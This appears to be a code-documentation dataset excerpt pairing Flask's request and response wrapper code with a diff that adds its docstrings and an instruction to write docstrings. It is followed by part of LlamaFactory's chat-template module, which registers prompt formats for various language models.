#: A dict of view arguments that matched the request. If an exception
#: happened when matching, this will be ``None``.
view_args: dict[str, t.Any] | None = None
#: If matching the URL failed, this is the exception that will be
#: raised / was raised as part of the request handling. This is
#: usually a :exc:`~werkzeug.exceptions.NotFound` exception or
#: something similar.
routing_exception: HTTPException | None = None
_max_content_length: int | None = None
_max_form_memory_size: int | None = None
_max_form_parts: int | None = None
@property
def max_content_length(self) -> int | None:
if self._max_content_length is not None:
return self._max_content_length
if not current_app:
return super().max_content_length
return current_app.config["MAX_CONTENT_LENGTH"] # type: ignore[no-any-return]
@max_content_length.setter
def max_content_length(self, value: int | None) -> None:
self._max_content_length = value
@property
def max_form_memory_size(self) -> int | None:
if self._max_form_memory_size is not None:
return self._max_form_memory_size
if not current_app:
return super().max_form_memory_size
return current_app.config["MAX_FORM_MEMORY_SIZE"] # type: ignore[no-any-return]
@max_form_memory_size.setter
def max_form_memory_size(self, value: int | None) -> None:
self._max_form_memory_size = value
@property # type: ignore[override]
def max_form_parts(self) -> int | None:
if self._max_form_parts is not None:
return self._max_form_parts
if not current_app:
return super().max_form_parts
return current_app.config["MAX_FORM_PARTS"] # type: ignore[no-any-return]
@max_form_parts.setter
def max_form_parts(self, value: int | None) -> None:
self._max_form_parts = value
@property
def endpoint(self) -> str | None:
if self.url_rule is not None:
return self.url_rule.endpoint # type: ignore[no-any-return]
return None
@property
def blueprint(self) -> str | None:
endpoint = self.endpoint
if endpoint is not None and "." in endpoint:
return endpoint.rpartition(".")[0]
return None
@property
def blueprints(self) -> list[str]:
name = self.blueprint
if name is None:
return []
return _split_blueprint_path(name)
def _load_form_data(self) -> None:
super()._load_form_data()
# In debug mode we're replacing the files multidict with an ad-hoc
# subclass that raises a different error for key errors.
if (
current_app
and current_app.debug
and self.mimetype != "multipart/form-data"
and not self.files
):
from .debughelpers import attach_enctype_error_multidict
attach_enctype_error_multidict(self)
def on_json_loading_failed(self, e: ValueError | None) -> t.Any:
try:
return super().on_json_loading_failed(e)
except BadRequest as ebr:
if current_app and current_app.debug:
raise
raise BadRequest() from ebr
class Response(ResponseBase):
default_mimetype: str | None = "text/html"
json_module = json
autocorrect_location_header = False
@property
def max_cookie_size(self) -> int: # type: ignore
if current_app:
return current_app.config["MAX_COOKIE_SIZE"] # type: ignore[no-any-return]
# return Werkzeug's default when not in an app context
return super().max_cookie_size | --- +++ @@ -16,6 +16,17 @@
class Request(RequestBase):
+ """The request object used by default in Flask. Remembers the
+ matched endpoint and view arguments.
+
+ It is what ends up as :class:`~flask.request`. If you want to replace
+ the request object used you can subclass this and set
+ :attr:`~flask.Flask.request_class` to your subclass.
+
+ The request object is a :class:`~werkzeug.wrappers.Request` subclass and
+ provides all of the attributes Werkzeug defines plus a few Flask
+ specific ones.
+ """
json_module: t.Any = json
@@ -47,6 +58,25 @@
@property
def max_content_length(self) -> int | None:
+ """The maximum number of bytes that will be read during this request. If
+ this limit is exceeded, a 413 :exc:`~werkzeug.exceptions.RequestEntityTooLarge`
+ error is raised. If it is set to ``None``, no limit is enforced at the
+ Flask application level. However, if it is ``None`` and the request has
+ no ``Content-Length`` header and the WSGI server does not indicate that
+ it terminates the stream, then no data is read to avoid an infinite
+ stream.
+
+ Each request defaults to the :data:`MAX_CONTENT_LENGTH` config, which
+ defaults to ``None``. It can be set on a specific ``request`` to apply
+ the limit to that specific view. This should be set appropriately based
+ on an application's or view's specific needs.
+
+ .. versionchanged:: 3.1
+ This can be set per-request.
+
+ .. versionchanged:: 0.6
+ This is configurable through Flask config.
+ """
if self._max_content_length is not None:
return self._max_content_length
@@ -61,6 +91,19 @@
@property
def max_form_memory_size(self) -> int | None:
+ """The maximum size in bytes any non-file form field may be in a
+ ``multipart/form-data`` body. If this limit is exceeded, a 413
+ :exc:`~werkzeug.exceptions.RequestEntityTooLarge` error is raised. If it
+ is set to ``None``, no limit is enforced at the Flask application level.
+
+ Each request defaults to the :data:`MAX_FORM_MEMORY_SIZE` config, which
+ defaults to ``500_000``. It can be set on a specific ``request`` to
+ apply the limit to that specific view. This should be set appropriately
+ based on an application's or view's specific needs.
+
+ .. versionchanged:: 3.1
+ This is configurable through Flask config.
+ """
if self._max_form_memory_size is not None:
return self._max_form_memory_size
@@ -75,6 +118,19 @@
@property # type: ignore[override]
def max_form_parts(self) -> int | None:
+ """The maximum number of fields that may be present in a
+ ``multipart/form-data`` body. If this limit is exceeded, a 413
+ :exc:`~werkzeug.exceptions.RequestEntityTooLarge` error is raised. If it
+ is set to ``None``, no limit is enforced at the Flask application level.
+
+ Each request defaults to the :data:`MAX_FORM_PARTS` config, which
+ defaults to ``1_000``. It can be set on a specific ``request`` to apply
+ the limit to that specific view. This should be set appropriately based
+ on an application's or view's specific needs.
+
+ .. versionchanged:: 3.1
+ This is configurable through Flask config.
+ """
if self._max_form_parts is not None:
return self._max_form_parts
@@ -89,6 +145,14 @@
@property
def endpoint(self) -> str | None:
+ """The endpoint that matched the request URL.
+
+ This will be ``None`` if matching failed or has not been
+ performed yet.
+
+ This in combination with :attr:`view_args` can be used to
+ reconstruct the same URL or a modified URL.
+ """
if self.url_rule is not None:
return self.url_rule.endpoint # type: ignore[no-any-return]
@@ -96,6 +160,16 @@
@property
def blueprint(self) -> str | None:
+ """The registered name of the current blueprint.
+
+ This will be ``None`` if the endpoint is not part of a
+ blueprint, or if URL matching failed or has not been performed
+ yet.
+
+ This does not necessarily match the name the blueprint was
+ created with. It may have been nested, or registered with a
+ different name.
+ """
endpoint = self.endpoint
if endpoint is not None and "." in endpoint:
@@ -105,6 +179,14 @@
@property
def blueprints(self) -> list[str]:
+ """The registered names of the current blueprint upwards through
+ parent blueprints.
+
+ This will be an empty list if there is no current blueprint, or
+ if URL matching failed.
+
+ .. versionadded:: 2.0.1
+ """
name = self.blueprint
if name is None:
@@ -138,6 +220,22 @@
class Response(ResponseBase):
+ """The response object that is used by default in Flask. Works like the
+ response object from Werkzeug but is set to have an HTML mimetype by
+ default. Quite often you don't have to create this object yourself because
+ :meth:`~flask.Flask.make_response` will take care of that for you.
+
+ If you want to replace the response object used you can subclass this and
+ set :attr:`~flask.Flask.response_class` to your subclass.
+
+ .. versionchanged:: 1.0
+ JSON support is added to the response, like the request. This is useful
+ when testing to get the test client response data as JSON.
+
+ .. versionchanged:: 1.0
+
+ Added :attr:`max_cookie_size`.
+ """
default_mimetype: str | None = "text/html"
@@ -147,8 +245,13 @@
@property
def max_cookie_size(self) -> int: # type: ignore
+ """Read-only view of the :data:`MAX_COOKIE_SIZE` config key.
+
+ See :attr:`~werkzeug.wrappers.Response.max_cookie_size` in
+ Werkzeug's docs.
+ """
if current_app:
return current_app.config["MAX_COOKIE_SIZE"] # type: ignore[no-any-return]
# return Werkzeug's default when not in an app context
- return super().max_cookie_size+ return super().max_cookie_size
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/wrappers.py |
Write docstrings describing functionality | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from copy import deepcopy
from dataclasses import dataclass
from typing import TYPE_CHECKING, Optional, Union
from typing_extensions import override
from ..extras import logging
from .data_utils import Role
from .formatter import EmptyFormatter, FunctionFormatter, StringFormatter, ToolFormatter
from .mm_plugin import get_mm_plugin
if TYPE_CHECKING:
from transformers import PreTrainedTokenizer
from ..hparams import DataArguments
from .formatter import SLOTS, Formatter
from .mm_plugin import BasePlugin
from .tool_utils import FunctionCall
logger = logging.get_logger(__name__)
@dataclass
class Template:
format_user: "Formatter"
format_assistant: "Formatter"
format_system: "Formatter"
format_function: "Formatter"
format_observation: "Formatter"
format_tools: "Formatter"
format_prefix: "Formatter"
default_system: str
stop_words: list[str]
thought_words: tuple[str, str]
tool_call_words: tuple[str, str]
efficient_eos: bool
replace_eos: bool
replace_jinja_template: bool
enable_thinking: Optional[bool]
mm_plugin: "BasePlugin"
def encode_oneturn(
self,
tokenizer: "PreTrainedTokenizer",
messages: list[dict[str, str]],
system: Optional[str] = None,
tools: Optional[str] = None,
) -> tuple[list[int], list[int]]:
encoded_messages = self._encode(tokenizer, messages, system, tools)
prompt_ids = []
for encoded_ids in encoded_messages[:-1]:
prompt_ids += encoded_ids
response_ids = encoded_messages[-1]
return prompt_ids, response_ids
def encode_multiturn(
self,
tokenizer: "PreTrainedTokenizer",
messages: list[dict[str, str]],
system: Optional[str] = None,
tools: Optional[str] = None,
) -> list[tuple[list[int], list[int]]]:
encoded_messages = self._encode(tokenizer, messages, system, tools)
return [(encoded_messages[i], encoded_messages[i + 1]) for i in range(0, len(encoded_messages), 2)]
def extract_tool(self, content: str) -> Union[str, list["FunctionCall"]]:
return self.format_tools.extract(content)
def get_stop_token_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
stop_token_ids = {tokenizer.eos_token_id}
for token in self.stop_words:
stop_token_ids.add(tokenizer.convert_tokens_to_ids(token))
return list(stop_token_ids)
def add_thought(self, content: str = "") -> str:
return f"{self.thought_words[0]}{self.thought_words[1]}" + content
def remove_thought(self, content: str) -> str:
pattern = re.compile(f"{re.escape(self.thought_words[0])}(.*?){re.escape(self.thought_words[1])}", re.DOTALL)
return re.sub(pattern, "", content).lstrip("\n")
def get_thought_word_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
return tokenizer.encode(self.add_thought(), add_special_tokens=False)
def _convert_elements_to_ids(self, tokenizer: "PreTrainedTokenizer", elements: "SLOTS") -> list[int]:
token_ids = []
for elem in elements:
if isinstance(elem, str):
if len(elem) != 0:
token_ids += tokenizer.encode(elem, add_special_tokens=False)
elif isinstance(elem, dict):
token_ids += [tokenizer.convert_tokens_to_ids(elem.get("token"))]
elif isinstance(elem, set):
if "bos_token" in elem and tokenizer.bos_token_id is not None:
token_ids += [tokenizer.bos_token_id]
elif "eos_token" in elem and tokenizer.eos_token_id is not None:
token_ids += [tokenizer.eos_token_id]
else:
raise ValueError(f"Input must be string, set[str] or dict[str, str], got {type(elem)}")
return token_ids
def _encode(
self,
tokenizer: "PreTrainedTokenizer",
messages: list[dict[str, str]],
system: Optional[str],
tools: Optional[str],
) -> list[list[int]]:
system = system or self.default_system
encoded_messages = []
for i, message in enumerate(messages):
elements = []
if i == 0:
elements += self.format_prefix.apply()
if system or tools:
tool_text = self.format_tools.apply(content=tools)[0] if tools else ""
elements += self.format_system.apply(content=(system + tool_text))
if message["role"] == Role.USER:
elements += self.format_user.apply(content=message["content"], idx=str(i // 2))
elif message["role"] == Role.ASSISTANT:
elements += self.format_assistant.apply(content=message["content"])
elif message["role"] == Role.OBSERVATION:
elements += self.format_observation.apply(content=message["content"])
elif message["role"] == Role.FUNCTION:
elements += self.format_function.apply(
content=message["content"], thought_words=self.thought_words, tool_call_words=self.tool_call_words
)
else:
raise NotImplementedError("Unexpected role: {}".format(message["role"]))
encoded_messages.append(self._convert_elements_to_ids(tokenizer, elements))
return encoded_messages
@staticmethod
def _add_or_replace_eos_token(tokenizer: "PreTrainedTokenizer", eos_token: str) -> None:
if tokenizer.eos_token == eos_token:
return
is_added = tokenizer.eos_token_id is None
num_added_tokens = tokenizer.add_special_tokens({"eos_token": eos_token})
if is_added:
logger.info_rank0(f"Add eos token: {tokenizer.eos_token}.")
else:
logger.info_rank0(f"Replace eos token: {tokenizer.eos_token}.")
if num_added_tokens > 0:
logger.warning_rank0("New tokens have been added, make sure `resize_vocab` is True.")
def fix_special_tokens(self, tokenizer: "PreTrainedTokenizer") -> None:
stop_words = self.stop_words
if self.replace_eos:
if not stop_words:
raise ValueError("Stop words are required to replace the EOS token.")
self._add_or_replace_eos_token(tokenizer, eos_token=stop_words[0])
stop_words = stop_words[1:]
if tokenizer.eos_token_id is None:
self._add_or_replace_eos_token(tokenizer, eos_token="<|endoftext|>")
if tokenizer.pad_token_id is None:
tokenizer.pad_token = tokenizer.eos_token
logger.info_rank0(f"Add pad token: {tokenizer.pad_token}")
if stop_words:
try:
num_added_tokens = tokenizer.add_special_tokens(
dict(additional_special_tokens=stop_words), replace_additional_special_tokens=False
)
except TypeError:
num_added_tokens = tokenizer.add_special_tokens(dict(additional_special_tokens=stop_words))
logger.info_rank0("Add {} to stop words.".format(",".join(stop_words)))
if num_added_tokens > 0:
logger.warning_rank0("New tokens have been added, make sure `resize_vocab` is True.")
@staticmethod
def _jinja_escape(content: str) -> str:
return content.replace("'", r"\'")
@staticmethod
def _convert_slots_to_jinja(slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content") -> str:
slot_items = []
for slot in slots:
if isinstance(slot, str):
slot_pieces = slot.split("{{content}}")
if slot_pieces[0]:
slot_items.append("'" + Template._jinja_escape(slot_pieces[0]) + "'")
if len(slot_pieces) > 1:
slot_items.append(placeholder)
if slot_pieces[1]:
slot_items.append("'" + Template._jinja_escape(slot_pieces[1]) + "'")
elif isinstance(slot, set): # do not use {{ eos_token }} since it may be replaced
if "bos_token" in slot and tokenizer.bos_token_id is not None:
slot_items.append("'" + tokenizer.bos_token + "'")
elif "eos_token" in slot and tokenizer.eos_token_id is not None:
slot_items.append("'" + tokenizer.eos_token + "'")
elif isinstance(slot, dict):
raise ValueError("Dict is not supported.")
return " + ".join(slot_items)
def _get_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> str:
prefix = self._convert_slots_to_jinja(self.format_prefix.apply(), tokenizer)
system = self._convert_slots_to_jinja(self.format_system.apply(), tokenizer, placeholder="system_message")
user = self._convert_slots_to_jinja(self.format_user.apply(), tokenizer)
assistant = self._convert_slots_to_jinja(self.format_assistant.apply(), tokenizer)
jinja_template = ""
if prefix:
jinja_template += "{{ " + prefix + " }}"
if self.default_system:
jinja_template += "{% set system_message = '" + self._jinja_escape(self.default_system) + "' %}"
jinja_template += (
"{% if messages[0]['role'] == 'system' %}{% set loop_messages = messages[1:] %}"
"{% set system_message = messages[0]['content'] %}{% else %}{% set loop_messages = messages %}{% endif %}"
"{% if system_message is defined %}{{ " + system + " }}{% endif %}"
"{% for message in loop_messages %}"
"{% set content = message['content'] %}"
"{% if message['role'] == 'user' %}"
"{{ " + user + " }}"
"{% elif message['role'] == 'assistant' %}"
"{{ " + assistant + " }}"
"{% endif %}"
"{% endfor %}"
)
return jinja_template
def fix_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> None:
if tokenizer.chat_template is None or self.replace_jinja_template:
try:
tokenizer.chat_template = self._get_jinja_template(tokenizer)
except ValueError as e:
logger.info_rank0(f"Cannot add this chat template to tokenizer: {e}.")
@staticmethod
def _convert_slots_to_ollama(
slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content"
) -> str:
slot_items = []
for slot in slots:
if isinstance(slot, str):
slot_pieces = slot.split("{{content}}")
if slot_pieces[0]:
slot_items.append(slot_pieces[0])
if len(slot_pieces) > 1:
slot_items.append("{{ " + placeholder + " }}")
if slot_pieces[1]:
slot_items.append(slot_pieces[1])
elif isinstance(slot, set): # do not use {{ eos_token }} since it may be replaced
if "bos_token" in slot and tokenizer.bos_token_id is not None:
slot_items.append(tokenizer.bos_token)
elif "eos_token" in slot and tokenizer.eos_token_id is not None:
slot_items.append(tokenizer.eos_token)
elif isinstance(slot, dict):
raise ValueError("Dict is not supported.")
return "".join(slot_items)
def _get_ollama_template(self, tokenizer: "PreTrainedTokenizer") -> str:
prefix = self._convert_slots_to_ollama(self.format_prefix.apply(), tokenizer)
system = self._convert_slots_to_ollama(self.format_system.apply(), tokenizer, placeholder=".System")
user = self._convert_slots_to_ollama(self.format_user.apply(), tokenizer, placeholder=".Content")
assistant = self._convert_slots_to_ollama(self.format_assistant.apply(), tokenizer, placeholder=".Content")
return (
f"{prefix}{{{{ if .System }}}}{system}{{{{ end }}}}"
f"""{{{{ range .Messages }}}}{{{{ if eq .Role "user" }}}}{user}"""
f"""{{{{ else if eq .Role "assistant" }}}}{assistant}{{{{ end }}}}{{{{ end }}}}"""
)
def get_ollama_modelfile(self, tokenizer: "PreTrainedTokenizer") -> str:
modelfile = "# ollama modelfile auto-generated by llamafactory\n\n"
modelfile += f'FROM .\n\nTEMPLATE """{self._get_ollama_template(tokenizer)}"""\n\n'
if self.default_system:
modelfile += f'SYSTEM """{self.default_system}"""\n\n'
for stop_token_id in self.get_stop_token_ids(tokenizer):
modelfile += f'PARAMETER stop "{tokenizer.convert_ids_to_tokens(stop_token_id)}"\n'
modelfile += "PARAMETER num_ctx 4096\n"
return modelfile
@dataclass
class Llama2Template(Template):
@override
def _encode(
self,
tokenizer: "PreTrainedTokenizer",
messages: list[dict[str, str]],
system: str,
tools: str,
) -> list[list[int]]:
system = system or self.default_system
encoded_messages = []
for i, message in enumerate(messages):
elements = []
system_text = ""
if i == 0:
elements += self.format_prefix.apply()
if system or tools:
tool_text = self.format_tools.apply(content=tools)[0] if tools else ""
system_text = self.format_system.apply(content=(system + tool_text))[0]
if message["role"] == Role.USER:
elements += self.format_user.apply(content=system_text + message["content"])
elif message["role"] == Role.ASSISTANT:
elements += self.format_assistant.apply(content=message["content"])
elif message["role"] == Role.OBSERVATION:
elements += self.format_observation.apply(content=message["content"])
elif message["role"] == Role.FUNCTION:
elements += self.format_function.apply(content=message["content"])
else:
raise NotImplementedError("Unexpected role: {}".format(message["role"]))
encoded_messages.append(self._convert_elements_to_ids(tokenizer, elements))
return encoded_messages
def _get_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> str:
prefix = self._convert_slots_to_jinja(self.format_prefix.apply(), tokenizer)
system_message = self._convert_slots_to_jinja(
self.format_system.apply(), tokenizer, placeholder="system_message"
)
user_message = self._convert_slots_to_jinja(self.format_user.apply(), tokenizer)
assistant_message = self._convert_slots_to_jinja(self.format_assistant.apply(), tokenizer)
jinja_template = ""
if prefix:
jinja_template += "{{ " + prefix + " }}"
if self.default_system:
jinja_template += "{% set system_message = '" + self._jinja_escape(self.default_system) + "' %}"
jinja_template += (
"{% if messages[0]['role'] == 'system' %}{% set loop_messages = messages[1:] %}"
"{% set system_message = messages[0]['content'] %}{% else %}{% set loop_messages = messages %}{% endif %}"
"{% for message in loop_messages %}"
"{% if loop.index0 == 0 and system_message is defined %}"
"{% set content = " + system_message + " + message['content'] %}"
"{% else %}{% set content = message['content'] %}{% endif %}"
"{% if message['role'] == 'user' %}"
"{{ " + user_message + " }}"
"{% elif message['role'] == 'assistant' %}"
"{{ " + assistant_message + " }}"
"{% endif %}"
"{% endfor %}"
)
return jinja_template
@dataclass
class ReasoningTemplate(Template):
@override
def encode_oneturn(
self,
tokenizer: "PreTrainedTokenizer",
messages: list[dict[str, str]],
system: Optional[str] = None,
tools: Optional[str] = None,
) -> tuple[list[int], list[int]]:
messages = deepcopy(messages)
for i in range(1, len(messages) - 2, 2):
messages[i]["content"] = self.remove_thought(messages[i]["content"])
if self.enable_thinking is False: # remove all cot
messages[-1]["content"] = self.remove_thought(messages[-1]["content"])
prompt_ids, response_ids = super().encode_oneturn(tokenizer, messages, system, tools)
if (
self.thought_words[0].strip() not in messages[-1]["content"]
and self.thought_words[1].strip() not in messages[-1]["content"]
): # add empty cot
if not self.enable_thinking: # do not compute loss
prompt_ids += self.get_thought_word_ids(tokenizer)
else: # do compute loss
response_ids = self.get_thought_word_ids(tokenizer) + response_ids
return prompt_ids, response_ids
@override
def encode_multiturn(
self,
tokenizer: "PreTrainedTokenizer",
messages: list[dict[str, str]],
system: Optional[str] = None,
tools: Optional[str] = None,
) -> list[tuple[list[int], list[int]]]:
messages = deepcopy(messages)
if self.enable_thinking is False: # remove all cot
for i in range(1, len(messages), 2):
messages[i]["content"] = self.remove_thought(messages[i]["content"])
encoded_messages = self._encode(tokenizer, messages, system, tools)
for i in range(0, len(messages), 2):
if (
self.thought_words[0].strip() not in messages[i + 1]["content"]
and self.thought_words[1].strip() not in messages[i + 1]["content"]
): # add empty cot
if not self.enable_thinking: # do not compute loss
encoded_messages[i] += self.get_thought_word_ids(tokenizer)
else: # do compute loss
encoded_messages[i + 1] = self.get_thought_word_ids(tokenizer) + encoded_messages[i + 1]
return [(encoded_messages[i], encoded_messages[i + 1]) for i in range(0, len(encoded_messages), 2)]
@dataclass
class Glm47ReasoningTemplate(ReasoningTemplate):
@override
def add_thought(self, content: str = "") -> str:
if not content:
return self.thought_words[1]
return self.thought_words[0] + content + self.thought_words[1]
TEMPLATES: dict[str, "Template"] = {}
def register_template(
name: str,
format_user: Optional["Formatter"] = None,
format_assistant: Optional["Formatter"] = None,
format_system: Optional["Formatter"] = None,
format_function: Optional["Formatter"] = None,
format_observation: Optional["Formatter"] = None,
format_tools: Optional["Formatter"] = None,
format_prefix: Optional["Formatter"] = None,
default_system: str = "",
stop_words: Optional[list[str]] = None,
thought_words: Optional[tuple[str, str]] = None,
tool_call_words: Optional[tuple[str, str]] = None,
efficient_eos: bool = False,
replace_eos: bool = False,
replace_jinja_template: bool = False,
enable_thinking: Optional[bool] = True,
mm_plugin: "BasePlugin" = get_mm_plugin(name="base"),
template_class: type["Template"] = Template,
) -> None:
if name in TEMPLATES:
raise ValueError(f"Template {name} already exists.")
default_slots = ["{{content}}"] if efficient_eos else ["{{content}}", {"eos_token"}]
default_user_formatter = StringFormatter(slots=["{{content}}"])
default_assistant_formatter = StringFormatter(slots=default_slots)
if format_assistant is not None:
default_function_formatter = FunctionFormatter(slots=format_assistant.slots, tool_format="default")
else:
default_function_formatter = FunctionFormatter(slots=default_slots, tool_format="default")
default_tool_formatter = ToolFormatter(tool_format="default")
default_prefix_formatter = EmptyFormatter()
TEMPLATES[name] = template_class(
format_user=format_user or default_user_formatter,
format_assistant=format_assistant or default_assistant_formatter,
format_system=format_system or default_user_formatter,
format_function=format_function or default_function_formatter,
format_observation=format_observation or format_user or default_user_formatter,
format_tools=format_tools or default_tool_formatter,
format_prefix=format_prefix or default_prefix_formatter,
default_system=default_system,
stop_words=stop_words or [],
thought_words=thought_words or ("<think>\n", "\n</think>\n\n"),
tool_call_words=tool_call_words or ("<tool_call>", "</tool_call>"),
efficient_eos=efficient_eos,
replace_eos=replace_eos,
replace_jinja_template=replace_jinja_template,
enable_thinking=enable_thinking,
mm_plugin=mm_plugin,
)
def parse_template(tokenizer: "PreTrainedTokenizer") -> "Template":
def find_diff(short_str: str, long_str: str) -> str:
i, j = 0, 0
diff = ""
while i < len(short_str) and j < len(long_str):
if short_str[i] == long_str[j]:
i += 1
j += 1
else:
diff += long_str[j]
j += 1
return diff
prefix = tokenizer.decode(tokenizer.encode(""))
messages = [{"role": "system", "content": "{{content}}"}]
system_slot = tokenizer.apply_chat_template(messages, add_generation_prompt=False, tokenize=False)[len(prefix) :]
messages = [{"role": "system", "content": ""}, {"role": "user", "content": "{{content}}"}]
user_slot_empty_system = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
user_slot_empty_system = user_slot_empty_system[len(prefix) :]
messages = [{"role": "user", "content": "{{content}}"}]
user_slot = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
user_slot = user_slot[len(prefix) :]
messages = [{"role": "user", "content": "{{content}}"}, {"role": "assistant", "content": "{{content}}"}]
assistant_slot = tokenizer.apply_chat_template(messages, add_generation_prompt=False, tokenize=False)
assistant_slot = assistant_slot[len(prefix) + len(user_slot) :]
template_class = ReasoningTemplate if "<think>" in assistant_slot else Template
assistant_slot = assistant_slot.replace("<think>", "").replace("</think>", "").lstrip("\n") # remove thought tags
if len(user_slot) > len(user_slot_empty_system):
default_system = find_diff(user_slot_empty_system, user_slot)
sole_system = system_slot.replace("{{content}}", default_system, 1)
user_slot = user_slot[len(sole_system) :]
else: # if defaut_system is empty, user_slot_empty_system will be longer than user_slot
default_system = ""
return template_class(
format_user=StringFormatter(slots=[user_slot]),
format_assistant=StringFormatter(slots=[assistant_slot]),
format_system=StringFormatter(slots=[system_slot]),
format_function=FunctionFormatter(slots=[assistant_slot], tool_format="default"),
format_observation=StringFormatter(slots=[user_slot]),
format_tools=ToolFormatter(tool_format="default"),
format_prefix=EmptyFormatter(slots=[prefix]) if prefix else EmptyFormatter(),
default_system=default_system,
stop_words=[],
thought_words=("<think>\n", "\n</think>\n\n"),
tool_call_words=("<tool_call>", "</tool_call>"),
efficient_eos=False,
replace_eos=False,
replace_jinja_template=False,
enable_thinking=True,
mm_plugin=get_mm_plugin(name="base"),
)
def get_template_and_fix_tokenizer(tokenizer: "PreTrainedTokenizer", data_args: "DataArguments") -> "Template":
if data_args.template is None:
if isinstance(tokenizer.chat_template, str):
logger.warning_rank0("`template` was not specified, try parsing the chat template from the tokenizer.")
template = parse_template(tokenizer)
else:
logger.warning_rank0("`template` was not specified, use `empty` template.")
template = TEMPLATES["empty"] # placeholder
else:
if data_args.template not in TEMPLATES:
raise ValueError(f"Template {data_args.template} does not exist.")
template = TEMPLATES[data_args.template]
if data_args.train_on_prompt and template.efficient_eos:
raise ValueError("Current template does not support `train_on_prompt`.")
if data_args.tool_format is not None:
logger.info_rank0(f"Using tool format: {data_args.tool_format}.")
default_slots = ["{{content}}"] if template.efficient_eos else ["{{content}}", {"eos_token"}]
template.format_function = FunctionFormatter(slots=default_slots, tool_format=data_args.tool_format)
template.format_tools = ToolFormatter(tool_format=data_args.tool_format)
if data_args.default_system is not None:
logger.info_rank0(f"Using default system message: {data_args.default_system}.")
template.default_system = data_args.default_system
if isinstance(template, ReasoningTemplate):
logger.warning_rank0(
"You are using reasoning template, "
"please add `_nothink` suffix if the model is not a reasoning model. "
"e.g., qwen3_vl_nothink"
)
template.enable_thinking = data_args.enable_thinking
template.fix_special_tokens(tokenizer)
template.fix_jinja_template(tokenizer)
return template
register_template(
name="alpaca",
format_user=StringFormatter(slots=["### Instruction:\n{{content}}\n\n### Response:\n"]),
format_assistant=StringFormatter(slots=["{{content}}", {"eos_token"}, "\n\n"]),
default_system=(
"Below is an instruction that describes a task. Write a response that appropriately completes the request.\n\n"
),
replace_jinja_template=True,
)
register_template(
name="bailing",
format_user=StringFormatter(slots=["<role>HUMAN</role>{{content}}<role>ASSISTANT</role>"]),
format_system=StringFormatter(slots=["<role>SYSTEM</role>{{content}}"]),
format_observation=StringFormatter(slots=["<role>OBSERVATION</role>{{content}}<role>ASSISTANT</role>"]),
stop_words=["<|endoftext|>"],
efficient_eos=True,
)
register_template(
name="bailing_v2",
format_user=StringFormatter(slots=["<role>HUMAN</role>{{content}}<|role_end|><role>ASSISTANT</role>"]),
format_system=StringFormatter(slots=["<role>SYSTEM</role>{{content}}<|role_end|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|role_end|>"]),
format_observation=StringFormatter(
slots=[
"<role>OBSERVATION</role>\n<tool_response>\n{{content}}\n</tool_response><|role_end|><role>ASSISTANT</role>"
]
),
format_function=FunctionFormatter(slots=["{{content}}<|role_end|>"], tool_format="ling"),
format_tools=ToolFormatter(tool_format="ling"),
stop_words=["<|endoftext|>"],
efficient_eos=True,
)
register_template(
name="breeze",
format_user=StringFormatter(slots=["[INST] {{content}} [/INST] "]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
efficient_eos=True,
)
register_template(
name="chatglm3",
format_user=StringFormatter(slots=[{"token": "<|user|>"}, "\n", "{{content}}", {"token": "<|assistant|>"}]),
format_assistant=StringFormatter(slots=["\n", "{{content}}"]),
format_system=StringFormatter(slots=[{"token": "<|system|>"}, "\n", "{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
format_observation=StringFormatter(
slots=[{"token": "<|observation|>"}, "\n", "{{content}}", {"token": "<|assistant|>"}]
),
format_tools=ToolFormatter(tool_format="glm4"),
format_prefix=EmptyFormatter(slots=[{"token": "[gMASK]"}, {"token": "sop"}]),
stop_words=["<|user|>", "<|observation|>"],
efficient_eos=True,
)
register_template(
name="chatml",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
stop_words=["<|im_end|>", "<|im_start|>"],
replace_eos=True,
replace_jinja_template=True,
)
# copied from chatml template
register_template(
name="chatml_de",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
default_system="Du bist ein freundlicher und hilfsbereiter KI-Assistent.",
stop_words=["<|im_end|>", "<|im_start|>"],
replace_eos=True,
replace_jinja_template=True,
)
register_template(
name="cohere",
format_user=StringFormatter(
slots=[
(
"<|START_OF_TURN_TOKEN|><|USER_TOKEN|>{{content}}<|END_OF_TURN_TOKEN|>"
"<|START_OF_TURN_TOKEN|><|CHATBOT_TOKEN|>"
)
]
),
format_system=StringFormatter(slots=["<|START_OF_TURN_TOKEN|><|SYSTEM_TOKEN|>{{content}}<|END_OF_TURN_TOKEN|>"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
# copied from chatml template
register_template(
name="cpm4",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
